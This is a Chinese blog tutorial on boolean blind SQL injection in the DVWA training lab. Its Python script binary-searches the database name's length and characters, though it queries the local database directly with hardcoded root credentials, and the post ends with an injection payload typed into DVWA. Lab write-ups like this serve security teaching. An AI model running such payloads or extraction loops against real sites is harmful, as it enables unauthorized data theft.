使用二分法爆破数据库名

已于 2024-09-27 09:15:06 修改
阅读量583 收藏 5
点赞数 17
文章标签: 数据库
于 2024-09-27 09:07:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73918008/article/details/142579002
版权

这一篇是基于dvwa下的SQL盲注(SDL Injection(Blind),在已知数据库存在和SDL盲注可行的前提下进行更深一步的操作。这里,我们将会通过python来爆破数据库名。

1.python连接数据库。

(1)首先我们需要查看自己的python是否已经已经安装了pymysql库,如果没有安装,可以通过Win+R打开命令行,输入pip install pymysql进行安装,也可以在pycharm应用中直接安装

找到pychram设置里面的python解释器,点击左上角的加号,输入pymysql,点击安装,等到显示成功就可以了。

安装到用户的站点软件包目录,如果不选择,我们就只能在pycharm的虚拟环境下使用,而且我是在选择python解释器3.8版本下进行安装的,如果我换成了其他的解释器,也是不能运行我们下载在虚拟环境下的库的。

(2)配置好环境后,我们就可以连接我们的库了。

# 数据库配置信息
db_config = {
    'host': 'localhost',        # 数据库服务器地址,我的直接使用的本机上的数据库
    'user': 'root',             #用户名
    'password': '123456',       #密码
    'database': 'dvwa',         #所要连接的数据库
    'port': 3306,               # 默认端口   
    'charset': 'utf8mb4'        #连接数据库时使用的字符集
}
# 连接数据库
connection = pymysql.connect(**db_config)

在mysql命令行输入status;可以查看数据库的信息,其中就包括了主机地址和端口号。

(3)建立游标,进行一个简单的数据库查询,看是否成功。

try:
    # 创建一个游标对象
    with connection.cursor() as cursor:
        # 执行 SQL 查询
        #从 `users` 表中选取 `user_id` 为 `'1'` 的用户的 `first_name` 和 `last_name`。
        sql_query = """
           SELECT first_name, last_name  
        FROM users 
        WHERE user_id = '1' 
        
        """
        #使用execute()方法,执行SQL语句
        cursor.execute(sql_query)

        # 获取查询结果
        #fetchall()函数,它的返回值是多个元组,即返回多个行记录,如果没有结果,返回的是()
        result = cursor.fetchall()

        # 输出结果
        for row in result:
            print(f"First Name: {row[0]}, Last Name: {row[1]}")

    # 提交事务(如果有写操作)
    # 当对数据库进行了一组相关的操作(如插入、更新或删除记录)后,如果想要保存这些更改到数据库中,
    #就需要调用 commit() 方法。一旦调用了此方法,所有在当前事务范围内的更改都将永久保存到数据库中。
    connection.commit()

except Exception as e:
    print(f"Error connecting to the database: {e}")
    # 回滚事务(如果有写操作且发生错误)
    #在一组数据库操作中,如果有任何错误或者异常发生,导致无法成功完成所有操作,
    #此时可以使用 rollback() 方法来撤销之前的所有变更,将数据库状态恢复到事务开始前的状态。
    connection.rollback()

finally:
    # 关闭数据库连接
    connection.close()

在这里,我解释一下游标的作用,在数据库编程中,游标是一种能够从数据库检索出一条或多条记录,并对这些记录进行处理的对象。游标可以被用来逐行读取查询结果,允许程序员像操作单个记录一样操作整个结果集。

当连接数据库后,游标开启的时候,我们就能在python中操作数据库中的内容,并将数据库的内容放回给用户。

除了上述查询结果的方式,还可以使用函数fetchone(),它的返回值是单个的元组,也就是一行记录,如果没有结果,那就会返回null。

如果只是查询数据库的内容就可以将代码简化,就不需要对数据库更改经行保存了。

2.使用二分法爆破数据库长度。

def get_database_length():
    l = 0
    m = 100

    while l < m:
        mid = (l + m) // 2
        sql_query = """
            SELECT 1 
            FROM users 
            WHERE user_id = '1' AND (SELECT LENGTH(DATABASE())) > %s
        """
        with connection.cursor() as cursor:
            cursor.execute(sql_query, (mid,))
            result = cursor.fetchone()

            if result:
                l = mid + 1
            else:
                m = mid

    return l

执行便可以看到运行结果,我这的数据库名的长度为4

3.使用二分法爆破数据库名。

我们的爆破是在我们已经知道数据库是字符串的条件下,而且已知数据库名是由字母组成进行爆破的。

def get_database_name(length):
    database_name = ''
    for i in range(1, length + 1):
        low = 32
        high = 127
        while low < high:
            mid = (low + high) // 2
            #ASCII函数是将数据库名的字符转换成ascii码
            sql_query = """
                SELECT 1 
                FROM users 
                WHERE user_id = '1' AND (SELECT ASCII(SUBSTRING(DATABASE(), %s, 1))) > %s
            """
            with connection.cursor() as cursor:
                cursor.execute(sql_query, (i, mid))
                result = cursor.fetchone()

                if result:
                    low = mid+1
                else:
                    high = mid

        # 将爆破出的字符添加到database_name中
        database_name += chr(low)

    return database_name

4.总的代码

import pymysql
# 数据库配置信息
db_config = {
    'host': 'localhost',     #数据库服务器地址
    'user': 'root',          #用户名
    'password': '123456',    #密码
    'database': 'dvwa',      #数据库名
    'port': 3306,            #默认端口
    'charset': 'utf8mb4'     ##连接数据库时使用的字符集
}

# 连接数据库
connection = pymysql.connect(**db_config)

#获得数据库名的长度
def get_database_length():
    l = 0
    m = 100

    while l < m:
        mid = (l + m) // 2 #保证mid是个整数
        sql_query = """
            SELECT 1 
            FROM users 
            WHERE user_id = '1' AND (SELECT LENGTH(DATABASE())) > %s
        """
        with connection.cursor() as cursor:
            cursor.execute(sql_query, (mid,))
            result = cursor.fetchone()

            if result:
                l = mid + 1
            else:
                m = mid

    return l

#获得数据库名
def get_database_name(length):
    database_name = ''
    for i in range(1, length + 1):
        low = 32
        high = 127
        while low < high:
            mid = (low + high) // 2
            #ASCII函数是将数据库名转换成ascii码
            sql_query = """
                SELECT 1 
                FROM users 
                WHERE user_id = '1' AND (SELECT ASCII(SUBSTRING(DATABASE(), %s, 1))) > %s
            """
            with connection.cursor() as cursor:
                cursor.execute(sql_query, (i, mid))
                result = cursor.fetchone()

                if result:
                    low = mid+1
                else:
                    high = mid

        # 将爆破出的字符添加到database_name里面
        database_name += chr(low)

    return database_name


try:
    # 得到数据库名长度
    db_length = get_database_length()
    print(f"The length of the database name is: {db_length}")

    # 得到数据库名
    db_name = get_database_name(db_length)
    print(f"The database name is: {db_name}")

finally:
    connection.close()

运行结果

5.我们可以将我们所得到的数据到DVWA网页进行验证,看是否正确。

先将其调到最低

在SQL Injection(Blind)输入:

1' AND DATABASE() ='dvwa

用户存在,说明我们爆破出来的数据库名是正确的。

小沐6667
关注
布尔盲注——多种方式实现及利用burpsuite爆破
m0_74312676的博客
07-25 1078
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,页面呈现出两种状态,正常或者不正常。根据这两种状态可以判断我们输入的语句是否查询成功。不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。
Pikachu布尔盲注结合BurpSuite获取数据库字详解
小小小屿屿屿的博客
11-18 539
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。盲注根据展现方式,分为布尔型盲注和时间型盲注。
ACCESS数据库注入
weixin_50464560的博客
07-11 718
1. 我们想来了解一下access数据库 Access注入是暴力猜解 Access数据结构(access只有一个数据库) Access数据库        数据 没有库这个概念 只有表这个概念 这应该就是今天的sql语句 <% id=request("id") sql="select * from product where id="&id set rs=conn.execute(sql) %> Set rs = c
SQl注入学习
weixin_42451330的博客
06-08 1008
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
sql注入之盲注
2301_80913334的博客
04-15 1258
sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。简单来说就是页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实现sql注入。web页面只返回True,False两种值。利用页面返回不同,逐个猜解数据1、布尔盲注不推荐使用手注但也需要了解其payload的构造;
SQLServer数据库注入测试
Jietewang的博客
04-11 1061
Part one:How phpstudy connects to SQL Server 2008 总结一下:使用PHPstudy集成环境中的php5.4.45连接SQL server 2008相关坑点。 在百度上能搜索到的大部份方法都是有效的,但是如果你是一个运气不太好的新手的话估计就要耗费你太多的精力。 首先需要明白的是Windows下的安装的PHPstudy集成环境是不能直接使用PHP连接数据库SQL Server 2008。这本身就是一个很恼火的事情,随着时代的进步,科技的发展,现在的人儿啊尽
爆破与dvwa靶场
ing_end的博客
02-05 2137
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户和密码被加密,用burp自带解码工具解码 发现用户和密码中间用冒号隔开 爆破成功 web22 题目:域也可以爆破的,试试爆破这个ctf.show的子域 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
SQL布尔盲注
2301_78549931的博客
08-05 966
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,如果正确执行了构造的SQL语句,则返回一种页面,如果错误,则执行另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。
Access注入详细笔记
weixin_46007361的博客
10-10 2193
Access注入
网络安全基础——SQL注入漏洞(一)
LinAime的博客
12-21 4939
injection注入攻击数字&字符型注入联合查询注入宽字节注入防御方法 SQL注入的原理 前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 注入的关键在于构造闭合 本文章将以pikachu靶场作为演示实验场景 数字&字符型注入 数字型、字符型注入的判断 判断数字型:在注入点输入 a and 1=1 ,a and 1=2, 第一个返回正常第二次返回错误,则为数字型 判断字符型:基本原理同上,但是需加入单引号做闭合
2021-08-28web培训作业2(sql实战注入尝试getshell,googlehacking,数据库拿到账户信息登录后台管理,fck的upload)
qq_45290991的博客
08-28 6921
目录 Web2用sql漏洞实战打点。 一、先用Google hacking 搜:inurl= 二、最后筛选出4个目标: 4.1有用信息1 4.2有用信息2 4.3有用的信息3 Web2用sql漏洞实战打点。 一、先用Google hacking 搜:inurl= english/board/view****.php?code=</br>--- title: GoogleHacking - SQL 注入 created: '2021-08-24T07:23:40.521Z
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1282
简单的SQL注入
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3111
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
小符sqli_labs1~65关的方法与感悟
fuyingyinger的博客
02-07 763
什么是SQL注入呢? SQL在管理数据库时,往往通过拼接的方式形成一个数据库语言,在拼接SQL语句的时候,可以通过改变SQL语句,让数据执行我们想要的语句,着同样也是危险的存在 开始前的心理准备 我真的是一脸懵啊,虽然前面也大致学过一些SQL语句,但是真当实践起来,还是懵的要死,还是多亏了学长给的资料sql注入天书还有找了找学长的博客才大致了解了这是什么东西,废话就不多说啦,冲冲冲! Page—1(Basic Challenges) Less-1 Get-Error based-Single quotes-
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4377
博主介绍: ✌我是阿龙,一专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 246
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
基于JavaWeb开发的Java+SpringMvc+vue+element实现驾校管理系统详细设计
最新发布
央顺科技官方博客
09-24 806
机遇与挑战始终并存。在开放的互联网平台面前,驾校预约管理系统的信息管理面临着巨大的挑战。传统的管理模式局限于简单数据的管理,无法适应不断变化的市场格局。在早期阶段,在将计算机技术和网络技术融入驾校预约管理系统数据管理方法之前,所有管理方式都通过人工操作完成了管理信息的。系统管理也都将通过计算机进行整体智能化操作,对于驾校预约管理系统所牵扯的管理及数据保存都是非常多的,举例像所有详细信息包括,管理员;首页、个人中心、学员管理、驾校教练管理、驾校车辆管理、预约管理、取消预约管理、驾校公告管理、系统管理。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 703
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值